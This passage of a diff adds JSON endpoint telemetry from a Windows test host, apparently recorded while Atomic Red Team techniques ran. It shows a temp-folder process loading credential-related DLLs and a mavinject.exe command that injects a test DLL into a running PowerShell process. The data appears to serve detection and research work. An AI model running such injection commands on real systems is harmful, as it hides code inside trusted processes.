"pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 976, + "process_name": 
"Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "certca.dll", + "image_path": "C:\\Windows\\System32\\certca.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": 
"registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": 
"LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "process", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "subtype": "terminate", + "timestamp": 131883573503230000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "file", + "file_name": "TEMPTCM.TMP-3991A72E.pf", + "file_path": "C:\\Windows\\Prefetch\\TEMPTCM.TMP-3991A72E.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573503230000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 5572, + "process_name": "cmd.exe", + 
"process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573503230000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "process", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7708, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573503510000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": 
"image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503540000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "process", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573503540000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573504480000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573504480000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 
131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573549480000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + 
"registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573549480000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573549480000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-7F44DDFD.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573557450016, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\mavinject.exe\" 7036 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7792, + "ppid": 7036, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "subtype": "create", + "timestamp": 131883573570600000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": 
"{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
